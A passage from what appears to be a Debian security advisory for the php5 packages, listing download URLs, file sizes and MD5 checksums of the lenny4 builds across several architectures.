http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 8928 f414f1c129483b8fe8cbc318a5eedb6e\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 36650 bcc4676043009ca54e18af9dd27e345e\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 37516 4f550822c831649ac425ae22d58a60b8\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 19676 29a0e716656bf8d60f9fd2e1edf2eb0e\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 362784 e3c1ab92a9f1dc91070a8395a9b105d7\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 24996 b34349f14e52b5ac097987585b476175\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 2674430 c3d9f1778f9a74d05501d6520ef16879\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 5080 831374f23d9bd03486b5d85203d086d6\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 12334 c8dad6976ecd6bccdfcb00d62c6e7c0c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 37164 97d3efa37a7349abd11a562b07d0d3f1\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 41630 02b132c756ed5123aa870b411dfa4287\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 14054 e86232b73c9a6830a0113989917ee4a4\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 2598730 41c38a0d06bf46b566775d92f3137c3a\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 15820 e9bcff8457e6384e8bd74053a7fad687\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 2673700 a03612222ffe9f28c4b43d0d5a7a99a8\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 27604 fff003a8549d23afea2869dbcfc9a4d5\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 19512564 6e8253c7ef2885fd55bc7c69aced60da\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 71714 4d1d39bbeef361c88d848fe23120ea2d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 57870 fcf66bcb2eb2219b0871d41e8118a00a\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 13802 0a23d4c322b3f5c99e7c31437ff6bec9\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 5412 1d7f872cc8fe84ca92e46087cc49653c\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 17670 dc82380d58f2dc09b6512c238be39688\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 5164256 2c73dc67889c06f055e57f916b7e465a\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_alpha.deb\n Size/MD5 checksum: 369570 3b3d5088cb3117006cbc08b91bfca793\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 5085904 b4f9755926b38c5bbf750130b46c8c36\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 27828 2dd7f5f19633ec3b95edaa32cd1e1a41\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 364864 4e1e7c037801fe32e53ef59a494302a7\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 367114 8e3e12d22761beb6614da92ce72a2e9c\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 5094 24bec334c129f1b8935079be7cb552ab\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 25242 9891b2748fa85b59fd8b104ae8309cea\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 2561414 fe49df2df47d3d7dca2bf88cf20c2a4c\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 48442 75c148c766532dce89889ba3d2238f31\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 73538 9eabc5c2efc8c0608c5df1f36cd90a71\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 12326 4ece26705bc6ebfb0ae0eac0d276bb1d\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 38078 ea04ff4ef5701c42535af6db2dee4d03\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 20144 d1a105aa743105a98ceba0ae83192c03\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 39864 d371d0d7d9681278d957b446eeeb984f\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 5430 362ccffa64f9f88d69400dc184611d74\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 8289420 76c467707bd7c4d0d418cb0dd2608d35\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 37030 50b827bc1caff8183b41481c2383d62e\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 40912 fd85bc423f585b3cff9255f1b6776237\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 13928 250ffb692df9fc9ef7d4dae23fa7bdb0\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 56858 bf0c5930e3f91ffb34c464b018231046\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 16504 14698f0330637137b9dbb8f04f42e81f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 2615932 2ae52b06befad28fa728331e74a69205\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 18124 332b7c10b6ce3b3857a16f43ebbb3347\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 2614644 a1d8a234b347ec857a3e5ac7addeecd8\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 14178 16cc5493c3cfb2895dbc5329e6f63c6c\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 37864 22965210129ba0b90f70a9853eb36508\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_amd64.deb\n Size/MD5 checksum: 9464 c6feec4b12661790a01d0907bbeb339d\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 11264 21b09079dc8345b064fee70347c14712\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 12462578 0d5c8891db819dbc4ba754c967aa7dad\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 24964 6966d1135dc769f79c9cf0a0f50d62e2\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 2439754 78c88915cfa23ab952e0ae911eb7686e\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 4966 5b5d6a3c8e2c6ee906dd8b7507b9df43\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 18024 4532987cf1c53d08befd9bf3d49033a3\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 34476 9081a54f847584db79422fc0ffc458ab\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 2447176 45fb35183c6c62bdd695d8c84224c4a5\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 23648 36353d6341c50ee59d815e115c4208ad\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 4748 66349a6f625201d6f408df225c816ea9\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 34030 2367c64fc75c0d3c82136a3d873a904d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 34218 f92a97953e10588f74fd65e8cd704c7d\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 63744 f07e0cbd756bb94a306c4d247255d258\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 13852 621dc08b6b5d9198d47d92aaf80b3f6c\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 12790 1ee052caad8fb06cc38c70371cdb1bab\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 34762 b6f021ff248d64188ffde62e8969047f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 2448492 b887c7658886a987342caedabbe46e4f\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 8366 d189e7c467b55a61286fb5c637031e28\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 16076 b1b5182781a8bb8720e643a134f02a5b\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 367074 cf9afcb9eddb67e676a418ac276b7593\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 12492 1ae0d8ac8dca6b87ebb4f2537cf9ffb9\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 32776 b965920dcf30d35d9239c6dbba47bf63\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 4847110 62e6c494c80fc2c8e77e375b9f72137f\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 366360 20e2c35199b44ff9bdc94fe7cae56da9\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_arm.deb\n Size/MD5 checksum: 51394 532f55af789f67e48884c12210340cc0\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 12605948 15a6d11310f7914fcb448436b6cd77aa\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 8374 04941fececb944a7144a8abad2caa863\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 14340 3ec6c153108015b9ed148dea2df47fb8\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 36148 52122d7fa391e15bbdb82ba5d9f1c3f2\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 25914 cafcab8d11d7ba94303e227e5ad36f2c\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 4847648 a3529551fa0e4dbc7dc2302a678e37f6\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 14692 876464c3794ca133f0fc6723c36ecdaa\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 2448278 41aecffb318a317ecf022de8a7cdbdd5\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 4704 85cfd4d6dcc9f734475d6214cfda5fcc\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 367530 89d077076a7bf4c40f78cd711d2342cc\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 4936 c4097ce8218bd33112f54429614551af\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 2449350 042e29d3ab7120fdf9c17fdd3cf3e617\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 34454 4a9b1aa02da12182a08536476becd257\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 33930 f62d352a5958f3427f08f5d1f0a170e0\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 2440376 4897d22468f259ee9be12e758ca9a0da\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 63818 60772d52fc57e124177a63d26874cb7b\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 51044 b15c349b1db9cb2a8760d14bbe2b2fa7\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 35808 4a06e70291d6c1d87660a98b8a989c91\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 18076 67d05122ccbde4ae855469717ee2cb0d\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 11292 3a7548995eb38f48ba58c0d464f53691\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 366810 818d293089ddb77973fb76269cb119f3\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 12296 542683b324f44cb25b00a6e8c940f6ca\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 16058 32ccdd921eedaf696b342dca5236e8bd\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 34304 bb66943fc47d9f08cdc6d5ba7c27e091\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_armel.deb\n Size/MD5 checksum: 24428 f328cf1256aafd4e120796f9828941e4\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 59412 757873eada94e035c42b40a8223976d0\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 19984 8763715a424bbd34708e5d8294adaf38\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 5248936 56655248faaa50ad3993c80f84e829ae\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 366718 5b1efaaf13e5b149c20a1fd4892d5a12\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 371012 aecfc9e61895739ceb75c0bc4bf55481\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 5602 66ce546286311947f9da8373f6d8f09c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 39150 330126acd68b112da8645cd1ec6acf96\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 14692 140f15ca96cc15c002901239c6d8293c\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 28974 d15bc6ef572f7ba5b3b90918c1139312\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 12966 017321dd7354698cc2524e22f6f8b2a2\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 40144 4e56fd9f6770f08f20ed28883f2c0fb6\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 16696 84c8f0d176ab76055c4ef6889359773b\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 8825224 65d8084843019118237e3aab5c70bf22\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 21306 d5a2f8f95d1afccdb3bb4907e30daa50\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 2749888 971152f013557ddaefb4070fd0f2e627\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 9726 4f63963cd922f8ac6fedbbbfd1b95b37\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 2642228 7680b8efeb1b256e3276fbbd3cdefe03\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 15678 a73f543734806b1e3f66e061dc9ed23c\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 28010 74e2546c35064930ec2cf55f5ba78638\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 5900 280db1b396a121f74fbee0d1ecaa6963\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 40704 bc0429fdd2e16e91fd966b56404a3f9a\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 41564 0b976a157afa3a07979ef957aedb46b4\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 39008 405c7ccba92d9598d0386d5cc7b24e8f\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 74380 8078c8e674137ecf20433b26247922de\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_hppa.deb\n Size/MD5 checksum: 2748624 bbc0b53b3bd706c43b8ef300d6afe3c6\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 2482922 208f37e972ef75ec8f523b0d23fd96c9\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 52366 3707092cee43aedcde4ce319285497ab\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 33548 c3a037fe3763dd678650f8ecf155d5b1\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 14202 ce163ac3822488ee9a983486ebf4a562\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 45164 6e34b5c552ed4078ba2f030ccf813837\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 11602 2223164ddbe8a6a49844d95aa5626d14\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 4911000 92362c5cb984c325520a55e1e002ebcf\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 4850 12262df32db3978db628398d300ae3a7\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 65752 04adcc201acbc00217f45234cb77f6c6\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 34600 0150f3c3acf9a56aa1c50799d7a48340\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 2484322 fa5e02bfc4a02d6eeaa78b6c7311da62\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 365082 4392cd0a81f4476fdd9742acc7bd6c93\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 8470280 72de688ddc3ccd2cd608c2e484f54171\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 12816 90c17f509e3c6fa6572576a0800e461c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 32390 5744d41850736ea9b996c6cb66e9d837\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 12924 828d2c034635500f64f5b098f7cbb7fb\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 5158 071eaa0a8b2199d592a1797d5e4d5883\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 18236 e5bc99009e981fccf50c904a0052936e\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 37674 e5a88b469517b3e0f934fab003622d43\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 34518 ef1ece7435c66eee3c1c85fd35a493d9\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 8468 669f1fb7284dcd3d20efc112f4b5a9eb\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 2474740 cb9e502935ca06c4302261950d783986\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 365616 fdecf9d9e454bb798f79cb52683170ce\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 23770 6e116b8d6ff24d733aa194e1975f5e0b\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 25576 f458f0d98f3fcaa76f8aa3257eabaead\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_i386.deb\n Size/MD5 checksum: 16608 1fd57beb77f5404babf1a11811f786d7\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 50862 df8f20cf686a980408951d3197594471\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 18608 d8090be691ab1b19fb442d9c6c77238a\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 50642 649e38828a78e8ef512109fb7258103d\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 34384 b955b55f8aa19dc0dbc91dbf3d540f4f\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 384392 ffc66934737f71056e962dd40b04dae8\n 